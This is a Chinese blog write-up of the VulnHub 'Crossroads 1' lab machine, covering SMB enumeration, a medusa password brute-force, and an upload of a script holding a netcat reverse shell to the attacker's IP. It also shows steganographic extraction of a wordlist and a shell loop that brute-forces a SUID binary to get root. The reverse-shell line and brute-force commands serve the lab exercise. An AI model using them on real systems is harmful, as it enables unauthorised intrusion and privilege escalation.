CROSSROADS1靶机复盘

最新推荐文章于 2024-08-03 11:39:59 发布
最新推荐文章于 2024-08-03 11:39:59 发布
阅读量254 收藏
点赞数
分类专栏: 打靶机系列 文章标签: 服务器 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131756227
版权

CROSSROADS1靶机复盘

这个靶机学会了三个工具enum4linux,smbclient,stegoveritas。枚举服务器可能开启的一些资源,smb扫描工具,还有一个隐写术的工具。

靶场下载地址:https://download.vulnhub.com/crossroads/crossroads_vh.ova

扫描到ip后对ip进行一个全面的扫描,发现这个靶机开启了smb服务,可以把这个服务比喻成文件共享服务。

image-20230713211942620

同时我们扫描一下ip地址,发现一个robots.txt文件

dirsearch -u http://192.168.102.171

image-20230714141052001

image-20230714141433801

enum4linux 工具可以枚举目标主机的网络配置、用户和组信息以及共享资源。

enum4linux 192.168.102.171

我们发现了一个用户名,但是smbclient查看还需要密码。

image-20230713214137922

使用美杜莎爆破一下smb服务的密码,hydra爆破很慢。

medusa  -d  查看可以爆破的服务,是有smb服务的。
medusa  -u  albert -P /usr/share/wordlist/rockyou.txt -M smbnt -h 192.168.102.171 -t 10

User: albert Password: bradley1

image-20230713214449171

smbclient //192.168.102.171/smbshare -U albert    #列出SMB服务器上的共享资源。

输入密码登录上。

发现只有一个文件,我们get到我们本机上,这是smb的配置文件。

image-20230713215449417

我们发现配置文件里面显示SMB会执行的一个脚本,但是smb里面又没有这个脚本,所以我们可以自己创建一个这样的脚本,然后上传到smb上面来。

image-20230713220453639

我在smbscript.sh中写了一个反弹shell脚本nc -e /bin/bash 192.168.102.129 8888

这样当put这个脚本到smb时候会自动执行一个反弹shell。

image-20230713220437819

我们接收就上来了,在上一层目录发现又一个同样的图片文件。

image-20230713220901366

ls -lh发现文件大小比我们刚才下载的要大了很多,猜测这个图片里面可能藏了东西,先把这个文件传到我们的kali上。

image-20230713220946818

find查找一下有root权限的文件,发现beroot文件时rws文件,执行后就可以获取root权限,但是执行后需要输入密码。

image-20230713221441920

image-20230713221511583

我们就想到了刚才跟靶机中拷贝到我们自己电脑上的图片文件,经过尝试,这个图片是利用stegoveritas 把数据隐写进去的,首先我们安装stegoveritas工具,需要用到python。

image-20230714092047728

image-20230714091733344

安装好后直接执行以下代码就可以取出里面隐写的内容,是保存到当前目录results目录中。

stegoveritas crossroads.png

image-20230714092305437

这里我们发现很多文件,挨个file以下,发现有一个text文件,查看了以下发现是个密码字典,我们把这个密码字典拷贝走。

image-20230714092621563

密码密码复制到/root目录下,起个新名字叫pass.txt,因为还有个文件和这个文件内容一样就查看了一下,发现只有这一个密码字典可以用。

diff 文件名 文件名 #如果没有任何区别,就代表两个文件一样

把pass.txt复制到靶机上,爆破一下beroot文件,,利用一下代码可以批量爆破。

for i in `cat pass.txt`;do echo $i >> tmp;echo $i|./beroot >> tmp ;done

image-20230714094816783

执行结束后我们ls下发现多了一个文件,就是rootcreds文件,cat一下发现是一个root账户密码。

image-20230714094934425

su root顺利提权成功。

image-20230714095026651

dumplings。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见的隐写工具的使用
z4yn:)的博客
09-28 5235
隐写术 常见的隐写工具的使用 steghide 隐藏文件 steghide embed -cf [载体] -ef [隐藏的文件] -p [设置密码] 例:steghide embed -cf sun.jpg -ef a.txt -p 123123 提取文件 steghide extract -sf sun.jpg steghide不支持png格式的隐写,zsteg支持png。 zsteg 用gem安装zsteg,没有小飞机的用国内的源 proxychains代理一挂,30秒安.
stegoVeritas:另一个Stego工具
04-29
StegoVeritas 另一个Stego工具 快速开始 安装 选项1-点 $ pip3 install stegoveritas $ stegoveritas_install_deps stegoveritas_install_deps当前支持:ubuntu,debian,kali,parrotOS,fedora,archlinux。 选项2-泊坞窗 $ sudo docker run -it --rm bannsec/stegoveritas 选项3- $ sudo pacman -S stegoveritas 跑步 StegoVeritas对大多数图像类型(gif,jpeg,png,tiff,bmp)具有默认操作,并将尝试在任何文件上运行。 stegoveritas <file> 如果您想做一些特定的事情,可以查看帮助: stegoveritas -h usage: s
BlueTeam 取证
人饭子的博客
10-30 1130
取证 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 数据恢复 操作系统取证 Android Windows Linux 文件取证 压缩包 爆破压缩包 伪加密 明文攻击 CRC32碰撞 视频 Deegger_Embedder...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
vulnhub-crossroads
weixin_43443135的博客
04-10 441
crossroads 环境 kali:192.168.1.103 靶机:192.168.1.107 信息收集 nmap 开放端口及服务 80:apache 139:smba 445:smba enum4linux 发现共享目录 smbshare 和用户 albert dirb 发现 robots.txt 爆破 smb 使用 msf 中的爆破模块进行 smb 爆破(hydra 爆久了会卡不知道为什么) ``` use auxiliary/scanner/smb/smb_login set rhost
VulnHub:crossroads靶机实战
Aukum的博客
07-03 1086
smb+反弹shell+图片隐写+suid提权,拿下vulnhub-crossroads
crossroads:1 靶机
lx_Zyu的博客
06-05 469
有一个beroot 运行一下 要我们输入root用户的密码回车,我们没有密码。文件夹下的这个文件大小要网页上的那个文件大,里面可能藏有东西。这里使用file是查看一下这些文件是什么文件类型。发现网页上的这个图片和文件里面的这个图片不一样。cd 进去发现有一些文件,使用file查看一下。发现在其下有一个png和网页上的那个名字一样。ls查看一下有个smb.conf 文件。还有一个user.txt文件 看一下。执行完后在本地生成一个results。开启靶机的web服务 8000端口。
CodeForces 812A-Sagheer and Crossroads
[SZU_Crayon]
08-16 233
CodeForces 812A-Sagheer and Crossroads 题目链接:A. Sagheer and Crossroads 思路: 题目大意是有一个交叉路口,每个路口有三个方向(l,s,r)左,中,以及通过该路口的人行道p,如果交叉路口有车行驶方向能朝向某一人行道,有可能发送事故,1表示绿灯可行,0表示红灯不可行,给定路况,可能发生事故输出YES,否则...
Codeforces 812A-Sagheer and Crossroads
wang_128的博客
06-02 538
Sagheer and Crossroads time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output Sagheer is walking in the street when
前端项目-crossroads.zip
09-02
1. **路由解析**:crossroads.js允许开发者定义URL模式,并将其与特定的处理函数关联。当URL改变时,crossroads.js会自动解析URL并找到相应的处理函数执行。 2. **灵活性**:由于其设计,crossroads.js不仅适用于...
crossroads-ar
03-08
crossroads-ar
Crossroads:视频会议网站
07-24
十字路口视频会议网站这是的链接网站特点: 屏幕共享会议期间的单播(私人 dm) 在会面期间和会后聊天通过网站在社交媒体上分享房间链接平台演练如果带宽允许,最多可容纳 10 名参与者。 要检查项目或贡献,只需克隆...
crds-connect:在crossroads.netconnect中搜索Crossroads组工具
02-17
crds-connect关于crossroads.net/connect组搜索工具的存储库。入门要在本地运行此项目,请安装依赖项并运行本地服务器: yarn installyarn start环境变量要为本地开发加载环境变量,请打开bearsharktopus-dev通道并...
standing-at-the-cloud-crossroads
03-14
"standing-at-the-cloud-crossroads"这个主题揭示了企业在云战略上的困境与机遇。"cloudnative"标签则暗示了讨论的核心是关于云原生技术的应用和管理。 云原生是一种构建和运行应用程序的方法,它充分利用了云计算...
VERITAS 安装配置实例
weixin_34216107的博客
12-22 805
VERITAS 安装配置实例一.安装VERITAS 远程客户端1.在备份机上,启动VERITAS;2.工具--》安装REMOTE AGENT3.选择下一步,在WINDOWS REMOTE AGENT,右键选择【手动添加远程计算机】4.输入域名【workgroup】及计算机名称5.输入登陆信息6.选择安装两个部件 (1)advanced open file ...
linux 常用的命令
caoyanzhi的博客
08-02 720
一、文件和目录操作 ls:列出目录内容。 cd:切换当前工作目录。 pwd:显示当前工作目录的绝对路径。 mkdir:创建新目录。 rmdir:删除空目录。 rm:删除文件或目录(使用-r选项递归删除目录)。 cp:复制文件或目录。 mv:移动或重命名文件或目录。 touch:创建空文件或修改文件时间戳。 find:在目录树中搜索文件,并执行指定的操作。 二、文本查看和处理 cat:查看文件内容,并可以将多个文件内容合并后输出。 more:分页显示文件内容。 less:与more类
Nginx常用命令(Linux)
最新发布
hanzhuhuaa的博客
08-03 172
nginx 常用命令。
open roads 二开设计架构
07-14
1. 数据架构:确定数据的存储结构和数据模型,包括道路、交通流量、车辆信息等数据的组织方式。 2. 系统架构:设计系统的整体结构,包括前端、后端和数据库等组件的划分和交互方式。 3. 前端架构:确定用户界面的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值